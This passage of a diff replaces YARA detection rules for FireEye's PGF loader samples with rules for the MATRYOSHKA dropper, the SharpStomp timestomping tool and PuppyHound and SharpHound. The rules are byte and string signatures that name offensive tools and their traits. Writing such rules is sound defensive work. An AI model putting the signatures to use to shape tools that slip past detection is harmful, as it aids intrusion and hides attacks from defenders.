?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 }
-		$cond5 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? B0 EF 3D 6A C7 85 ?? ?? ?? ?? 8C FF 3D 6A 8D 85 ?? ?? ?? ?? 89 28 BA F4 1A 3C 6A 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 62 40 41 6A A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 6E 40 41 6A 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 3C 6A 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 3C 6A 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 }
-		$cond6 = { 55 89 E5 57 56 53 81 EC FC 06 00 00 C7 85 ?? ?? ?? ?? F0 EF D5 63 C7 85 ?? ?? ?? ?? CC FF D5 63 8D 85 ?? ?? ?? ?? 89 28 BA 28 1B D4 63 89 50 ?? 89 60 ?? 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? FF FF FF FF FF D0 C7 44 24 ?? 04 01 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 E8 ?? ?? ?? ?? 83 EC 0C 85 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 55 ?? 89 54 24 ?? 8D 95 ?? ?? ?? ?? 89 14 24 C7 85 ?? ?? ?? ?? 01 00 00 00 89 C1 E8 ?? ?? ?? ?? 83 EC 08 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 89 44 24 ?? C7 04 24 08 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 45 ?? 00 00 00 00 C7 45 ?? 00 00 00 00 C7 85 ?? ?? ?? ?? 28 04 00 00 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? 83 7D ?? 00 74 ?? 8D 85 ?? ?? ?? ?? C7 44 24 ?? 00 00 00 00 8D 95 ?? ?? ?? ?? 83 C2 20 89 14 24 89 C1 E8 ?? ?? ?? ?? 83 EC 08 83 F8 FF 0F 95 C0 84 C0 74 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8B 85 ?? ?? ?? ?? 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? 83 EC 08 89 45 ?? EB ?? 8B 45 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 83 7D ?? 00 74 ?? 83 7D ?? 00 75 ?? C7 85 ?? ?? ?? ?? 00 00 00 00 E9 ?? ?? ?? ?? C7 04 24 7E 40 D9 63 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 04 C7 44 24 ?? 8A 40 D9 63 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 89 45 ?? 89 E8 89 45 ?? 8D 85 ?? ?? ?? ?? 89 44 24 ?? 8D 85 ?? ?? ?? ?? 89 04 24 A1 ?? ?? ?? ?? FF D0 83 EC 08 C7 45 ?? 00 00 00 00 8B 55 ?? 8B 85 ?? ?? ?? ?? 39 C2 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 3D FF 0F 00 00 0F 86 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 73 ?? 8B 45 ?? 8B 00 8B 55 ?? 81 C2 00 10 00 00 39 D0 73 ?? C7 45 ?? 01 00 00 00 83 7D ?? 00 0F 84 ?? ?? ?? ?? 8B 45 ?? 8B 00 39 45 ?? 0F 83 ?? ?? ?? ?? 8B 45 ?? 8B 00 8B 4D ?? 8B 55 ?? 01 CA 39 D0 0F 83 ?? ?? ?? ?? B9 00 00 00 00 B8 1C 00 00 00 83 E0 FC 89 C2 B8 00 00 00 00 89 8C 05 ?? ?? ?? ?? 83 C0 04 39 D0 72 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 1C 00 00 00 8D 95 ?? ?? ?? ?? 89 54 24 ?? 89 04 24 A1 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 02 00 00 00 FF D0 83 EC 0C 8B 85 ?? ?? ?? ?? 83 E0 20 85 C0 74 ?? 8B 45 ?? 8B 00 C7 44 24 ?? 30 14 D4 63 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 00 00 00 00 EB ?? 90 EB ?? 90 83 45 ?? 04 E9 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 89 C2 8B 45 ?? 01 D0 89 45 ?? 8B 45 ?? 8B 50 ?? 8B 45 ?? 01 D0 89 45 ?? C7 44 24 ?? 30 14 D4 63 8B 45 ?? 89 04 24 C7 85 ?? ?? ?? ?? 02 00 00 00 E8 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? 01 00 00 00 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 83 BD ?? ?? ?? ?? 01 EB ?? 8B 95 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 85 C0 74 ?? 83 E8 01 85 C0 74 ?? 83 E8 01 0F 0B 89 95 ?? ?? ?? ?? 8D 45 ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 89 C1 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 89 04 24 C7 85 ?? ?? ?? ?? FF FF FF FF E8 ?? ?? ?? ?? 90 8D 85 ?? ?? ?? ?? 89 04 24 E8 ?? ?? ?? ?? 8D 65 ?? 5B 5E 5F 5D C3 }
+		$s1 = ".pop(0)])"
+		$s2 = "[1].replace('unsigned char buf[] = \"'"
+		$s3 = "binascii.hexlify(f.read()).decode("
+		$s4 = "os.system(\"cargo build {0} --bin {1}\".format("
+		$s5 = "shutil.which('rustc')"
+		$s6 = "~/.cargo/bin"
+		$s7 = /[\x22\x27]\\\\x[\x22\x27]\.join\(\[\w{1,64}\[\w{1,64}:\w{1,64}[\x09\x20]{0,32}\+[\x09\x20]{0,32}2\]/
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and any of them
+		all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_PGF_4 : FILE
+rule FIREEYE_RT_APT_Dropper_Win_MATRYOSHKA_1 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "matryoshka_dropper.rs"
 		author = "FireEye"
-		id = "4c93ba76-d3a5-568d-88b8-79a6ebc2edbb"
-		date = "2020-11-26"
-		date = "2020-11-26"
+		id = "7fd305c7-0b1b-5d91-b968-7f1fb0a8ae47"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_4.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/MATRYOSHKA/production/yara/APT_Dropper_Win_MATRYOSHKA_1.yar#L4-L20"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "3bb34ebd93b8ab5799f4843e8cc829fa"
-		logic_hash = "fcc92674e58ec6418d7c709e3f3bc2e1ec859fe0cb444412964a978fb69f5234"
+		hash = "edcd58ba5b1b87705e95089002312281"
+		logic_hash = "a7bf7599ec9b4b1d09a8c90b70ae565a9396fb31d449da3c1492d6fa336d9c5e"
 		score = 75
 		quality = 75
 		tags = "FILE"
 		rev = 1
 
 	strings:
-		$sb1 = { 41 B9 04 00 00 00 41 B8 00 10 00 00 BA [4] B9 00 00 00 00 [0-32] FF [1-24] 7? [1-150] 8B 45 [0-32] 44 0F B? ?? 8B [2-16] B? CD CC CC CC [0-16] C1 ?? 04 [0-16] C1 ?? 02 [0-16] C1 ?? 02 [0-16] 48 8? 05 [4-32] 31 [1-4] 88 }
-		$sb2 = { C? 45 ?? 48 [0-32] B8 [0-64] FF [0-32] E0 [0-32] 41 B8 40 00 00 00 BA 0C 00 00 00 48 8B [2] 48 8B [2-32] FF [1-16] 48 89 10 8B 55 ?? 89 ?? 08 48 8B [2] 48 8D ?? 02 48 8B 45 18 48 89 02 }
+		$s1 = "\x00matryoshka.exe\x00"
+		$s2 = "\x00Unable to write data\x00"
+		$s3 = "\x00Error while spawning process. NTStatus: \x0a\x00"
+		$s4 = "\x00.execmdstart/Cfailed to execute process\x00"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win64_PGF_1 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_1 : FILE
 {
 	meta:
-		description = "base dlls: /lib/payload/techniques/unmanaged_exports/"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "1f2280c0-0fdd-5930-947a-931274bccd6f"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "4b4a54c8-9717-5fbb-8130-a49162bc6b07"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win64_PGF_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/APT_HackTool_MSIL_SHARPSTOMP_1.yar#L4-L24"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "2b686a8b83f8e1d8b455976ae70dab6e"
-		logic_hash = "2e84d614c34b0b7f93fa70fa3312f22e3ff23f2abd33b2e19c00dd6cba7dcfdc"
+		hash = "83ed748cd94576700268d35666bf3e01"
+		logic_hash = "af8aa0e87d8b6623a908fde5014f3849cd0ca20d5926c798be82ce4eab2668bb"
 		score = 75
-		quality = 75
+		quality = 71
 		tags = "FILE"
-		rev = 1
+		rev = 3
 
 	strings:
-		$sb1 = { B9 14 00 00 00 FF 15 [4-32] 0F B6 ?? 04 [0-32] F3 A4 [0-64] 0F B6 [2-3] 0F B6 [2-3] 33 [0-32] 88 [1-9] EB }
-		$sb2 = { 41 B8 00 30 00 00 [0-32] FF 15 [8-64] 83 ?? 01 [4-80] 0F B6 [1-64] 33 [1-32] 88 [1-64] FF ( D? | 5? ) }
-		$sb3 = { 48 89 4C 24 08 [4-64] 48 63 48 3C [0-32] 48 03 C1 [0-64] 0F B7 48 14 [0-64] 48 8D 44 08 18 [8-64] 0F B7 40 06 [2-32] 48 6B C0 28 }
+		$s0 = "mscoree.dll" fullword nocase
+		$s1 = "timestompfile" fullword nocase
+		$s2 = "sharpstomp" fullword nocase
+		$s3 = "GetLastWriteTime" fullword
+		$s4 = "SetLastWriteTime" fullword
+		$s5 = "GetCreationTime" fullword
+		$s6 = "SetCreationTime" fullword
+		$s7 = "GetLastAccessTime" fullword
+		$s8 = "SetLastAccessTime" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x020B ) and all of them
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win_PGF_2 : FILE
+rule FIREEYE_RT_APT_Hacktool_MSIL_SHARPSTOMP_2 : FILE
 {
 	meta:
-		description = "PE rich header matches PGF backdoor"
+		description = "No description has been set in the source file - FireEye-RT"
 		author = "FireEye"
-		id = "595c9e2a-3d9d-5366-9449-de1bcf333f78"
-		date = "2020-12-09"
+		id = "d1a3477d-55c6-5c33-bd65-5b1e0d65f24b"
+		date = "2020-12-02"
+		date = "2020-12-02"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win_PGF_2.yar#L4-L21"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/APT_HackTool_MSIL_SHARPSTOMP_2.yar#L4-L22"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "226b1ac427eb5a4dc2a00cc72c163214"
-		logic_hash = "b8c024c6b4c3ce9915700b62da8a1f12440215b46f3a56078707f5257e575811"
+		hash = "83ed748cd94576700268d35666bf3e01"
+		logic_hash = "4ed1553f12c607792d7d4e7026ecb36231cd417a06eba8b2925c2c643436b5fe"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		md5_2 = "2398ed2d5b830d226af26dedaf30f64a"
-		md5_3 = "24a7c99da9eef1c58f09cf09b9744d7b"
-		md5_4 = "aeb0e1d0e71ce2a08db9b1e5fb98e0aa"
-		rev = 4
+		rev = 3
 
 	strings:
-		$rich1 = { A8 B7 17 3A EC D6 79 69 EC D6 79 69 EC D6 79 69 2F D9 24 69 E8 D6 79 69 E5 AE EC 69 EA D6 79 69 EC D6 78 69 A8 D6 79 69 E5 AE EA 69 EF D6 79 69 E5 AE FA 69 D0 D6 79 69 E5 AE EB 69 ED D6 79 69 E5 AE FD 69 E2 D6 79 69 CB 10 07 69 ED D6 79 69 E5 AE E8 69 ED D6 79 69 }
-		$rich2 = { C1 CF 75 A4 85 AE 1B F7 85 AE 1B F7 85 AE 1B F7 8C D6 88 F7 83 AE 1B F7 0D C9 1A F6 87 AE 1B F7 0D C9 1E F6 8F AE 1B F7 0D C9 1F F6 8F AE 1B F7 0D C9 18 F6 84 AE 1B F7 DE C6 1A F6 86 AE 1B F7 85 AE 1A F7 BF AE 1B F7 84 C3 12 F6 81 AE 1B F7 84 C3 E4 F7 84 AE 1B F7 84 C3 19 F6 84 AE 1B F7 }
-		$rich3 = { D6 60 82 B8 92 01 EC EB 92 01 EC EB 92 01 EC EB 9B 79 7F EB 94 01 EC EB 1A 66 ED EA 90 01 EC EB 1A 66 E9 EA 98 01 EC EB 1A 66 E8 EA 9A 01 EC EB 1A 66 EF EA 90 01 EC EB C9 69 ED EA 91 01 EC EB 92 01 ED EB AF 01 EC EB 93 6C E5 EA 96 01 EC EB 93 6C 13 EB 93 01 EC EB 93 6C EE EA 93 01 EC EB }
-		$rich4 = { 41 36 64 33 05 57 0A 60 05 57 0A 60 05 57 0A 60 73 CA 71 60 01 57 0A 60 0C 2F 9F 60 04 57 0A 60 0C 2F 89 60 3D 57 0A 60 0C 2F 8E 60 0A 57 0A 60 05 57 0B 60 4A 57 0A 60 0C 2F 99 60 06 57 0A 60 73 CA 67 60 04 57 0A 60 0C 2F 98 60 04 57 0A 60 0C 2F 80 60 04 57 0A 60 22 91 74 60 04 57 0A 60 0C 2F 9B 60 04 57 0A 60 }
+		$f0 = "mscoree.dll" fullword nocase
+		$s0 = { 06 72 [4] 6F [4] 2C ?? 06 72 [4] 6F [4] 2D ?? 72 [4] 28 [4] 28 [4] 2A }
+		$s1 = { 02 28 [4] 0A 02 28 [4] 0B 02 28 [4] 0C 72 [4] 28 [4] 72 }
+		$s2 = { 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 02 28 [4] 0D 12 ?? 03 6C 28 [4] 28 [4] 72 }
+		$s3 = "SetCreationTime" fullword
+		$s4 = "GetLastAccessTime" fullword
+		$s5 = "SetLastAccessTime" fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize < 15MB and ( ( $rich1 at 128 ) or ( $rich2 at 128 ) or ( $rich3 at 128 ) or ( $rich4 at 128 ) )
+		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win_PGF_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharpstomp_1 : FILE
 {
 	meta:
-		description = "PDB string used in some PGF DLL samples"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the SharpStomp project."
 		author = "FireEye"
-		id = "14e2102c-3572-5314-999c-ff3f6c94de03"
-		date = "2024-03-04"
-		modified = "2024-03-04"
+		id = "e113c221-fabe-5af4-b763-463c4f86288d"
+		date = "2020-12-09"
+		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win_PGF_1.yar#L4-L17"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/SHARPSTOMP/production/yara/HackTool_MSIL_SharpStomp_1.yar#L4-L15"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "013c7708f1343d684e3571453261b586"
-		logic_hash = "9dede268d33a38e980026917bd01bc47a72bfe60ba4a999c91eb727a2f377462"
+		hash = "83ed748cd94576700268d35666bf3e01"
+		logic_hash = "fd0a3d046734d48be74d9a74f27570468550d21911c54ca82c81a1d64e9fdd17"
 		score = 75
-		quality = 48
+		quality = 73
 		tags = "FILE"
-		rev = 6
+		rev = 4
 
 	strings:
-		$pdb1 = /RSDS[\x00-\xFF]{20}c:\\source\\dllconfig-master\\dllsource[\x00-\xFF]{0,500}\.pdb\x00/ nocase
-		$pdb2 = /RSDS[\x00-\xFF]{20}C:\\Users\\Developer\\Source[\x00-\xFF]{0,500}\\Release\\DllSource\.pdb\x00/ nocase
-		$pdb3 = /RSDS[\x00-\xFF]{20}q:\\objchk_win7_amd64\\amd64\\init\.pdb\x00/ nocase
+		$typelibguid1 = "41f35e79-2034-496a-8c82-86443164ada2" ascii nocase wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and filesize < 15MB and any of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and $typelibguid1
 }
-rule FIREEYE_RT_APT_Loader_Win32_PGF_1 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Puppyhound_1 : FILE
 {
 	meta:
-		description = "base dlls: /lib/payload/techniques/unmanaged_exports/"
+		description = "This is a modification of an existing FireEye detection for SharpHound. However, it looks for the string 'PuppyHound' instead of 'SharpHound' as this is all that was needed to detect the PuppyHound variant of SharpHound."
 		author = "FireEye"
-		id = "1af4f2ce-c540-5836-a749-43a0b08609b1"
-		date = "2020-11-25"
-		date = "2020-11-25"
+		id = "1155f959-c8bc-597a-8a80-abee8d95b6ec"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_1.yar#L4-L19"
+		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PUPPYHOUND/production/yara/HackTool_MSIL_PuppyHound_1.yar#L4-L19"
 		license_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/LICENSE.txt"
-		hash = "383161e4deaf7eb2ebeda2c5e9c3204c"
-		logic_hash = "d3fb0bd7b678b19ee2e0e846f4e13e4ce7e2629ecda123f34ef52f2af42d2a8e"
+		hash = "eeedc09570324767a3de8205f66a5295"
+		logic_hash = "39073bbfef15ecd28c1772e5d01e54c3d5774ecb4c90f0076bda5dc400abacba"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		rev = 1
+		rev = 6
 
 	strings:
-		$sb1 = { 6A ?? FF 15 [4-32] 8A ?? 04 [0-32] 8B ?? 89 ?? 8B [2] 89 [2] 8B [2] 89 ?? 08 8B [2] 89 [2] 8B [2] 89 [2-64] 8B [5] 83 ?? 01 89 [5] 83 [5-32] 0F B6 [1-2] 0F B6 [1-2] 33 [1-16] 88 ?? EB }
-		$sb2 = { 6A 40 [0-32] 68 00 30 00 00 [0-32] 6A 00 [0-16] FF 15 [4-32] 89 45 [4-64] E8 [4-32] 83 ?? 01 [4-80] 0F B6 [1-64] 33 [1-32] 88 [2-64] FF ( D? | 55 ) }
-		$sb3 = { 8B ?? 08 03 ?? 3C [2-32] 0F B? ?? 14 [0-32] 8D [2] 18 [2-64] 0F B? ?? 06 [3-64] 6B ?? 28 }
+		$1 = "PuppyHound"
+		$2 = "UserDomainKey"
+		$3 = "LdapBuilder"
+		$init = { 28 [2] 00 0A 0A 72 [2] 00 70 1? ?? 28 [2] 00 0A 72 [2] 00 70 1? ?? 28 [2] 00 0A 28 [2] 00 0A 0B 1F 2D }
+		$msil = /\x00_Cor(Exe|Dll)Main\x00/
 
 	condition:
-		( uint16( 0 ) == 0x5A4D ) and ( uint32( uint32( 0x3C ) ) == 0x00004550 ) and ( uint16( uint32( 0x3C ) + 0x18 ) == 0x010B ) and all of them
+		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and all of them
 }
-rule FIREEYE_RT_APT_Loader_Win32_PGF_4 : FILE
+rule FIREEYE_RT_Hacktool_MSIL_Sharphound_3 : FILE
 {
 	meta:
-		description = "No description has been set in the source file - FireEye-RT"
+		description = "The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the '.csproj' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project."
 		author = "FireEye"
-		id = "d46d9ae9-cb7d-5a25-9ee2-766097c14af6"
-		date = "2020-11-26"
-		date = "2020-11-26"
+		id = "456b3208-1e8d-5eb7-81ee-39f1c886c5a7"
+		date = "2020-12-09"
 		modified = "2020-12-09"
 		reference = "https://github.com/mandiant/red_team_tool_countermeasures/"
-		source_url = "https://github.com/mandiant/red_team_tool_countermeasures//blob/3561b71724dbfa3e2bb78106aaa2d7f8b892c43b/rules/PGF/production/yara/APT_Loader_Win32_PGF_4.yar#L4-L17"
